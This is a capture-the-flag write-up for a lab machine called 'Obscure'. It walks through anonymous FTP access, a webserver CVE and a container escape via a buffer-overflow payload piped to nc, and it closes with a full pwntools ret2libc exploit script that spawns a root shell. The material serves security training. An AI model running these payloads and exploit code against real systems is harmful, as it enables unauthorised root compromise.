Obscure Discussion [WRITE-UP]

Let’s talk about Obscure.

1. Connect to the FTP server as anonymous

Retrieve the password from the FTP server.

2. Login to the webserver

Use the password to login to the webserver. You need to figure out the email address of the user as well.

3. Exploit the webserver to get a shell

CVE-2017-10803 is a vulnerability in the webserver. Exploit it to get a shell.

4. Exploit the binary to escape from the container

Use this one-liner to get a shell on the host machine.

python -c 'print(b"A"*136 + b"\x47\x06\x40\x00")' > payload && cat payload - |  nc 172.17.0.1 4444

5. Get root

And finally, using this exploit, perform a ret2libc attack to get root, remotely. Transfer exploit_me and /lib/x86_64-linux-gnu/libc.so.6 to your machine and run the exploit.

from pwn import ELF, ROP, remote, log, p64, u64 , process, ssh

user = "zeeshan"
keyfile= "id_rsa"
port = 22
HOST = "10.10.xxx.xxx"

s = ssh(host=HOST, user=user, keyfile=keyfile, port=port)

LOCAL_BIN = "./exploit_me"
LIBC = ELF("./libc.so.6")
P = s.process("/exploit_me")
ELF_LOADED = ELF(LOCAL_BIN)
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
ROP_LOADED = ROP(ELF_LOADED)
OFFSET = b"A"*40

libc_func = "puts"
PUTS_PLT = ELF_LOADED.symbols["puts"]  

MAIN_PLT = ELF_LOADED.symbols['main']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] 
RET = (ROP_LOADED.find_gadget(['ret']))[0]

log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
log.info("ret gadget: " + hex(RET))

def generate_payload_aligned(rop):
    payload1 = OFFSET + rop
    if (len(payload1) % 16) == 0:
        return payload1
    else:
        payload2 = OFFSET + p64(RET) + rop
        if (len(payload2) % 16) == 0:
            log.info("Payload aligned successfully")
            return payload2
        else:
            log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
            return payload1


def get_addr(libc_func):
    FUNC_GOT = ELF_LOADED.got[libc_func]
    log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
    rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
    rop1 = generate_payload_aligned(rop1)
    P.recvuntil(b"!")
    P.sendline(rop1)
    P.recvline() 
    recieved = P.recvline().strip()
    log.critical(f"Recieved: {recieved}")
    log.info(f"Recieved: {recieved}")
    log.info(f"Len rop1: {len(rop1)}")
    leak = u64(recieved.ljust(8, b"\x00"))
    log.info(f"Leaked LIBC address,  {libc_func}: {hex(leak)}")
    
    if LIBC:
        LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
        print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
        log.info("LIBC base @ %s" % hex(LIBC.address))
    else:
        print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
        P.interactive()
    
    return hex(leak)

get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base

BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"]

log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT))

rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2)
    

print(P.clean())
P.sendline(rop2)

P.interactive() #Interact with your shell :)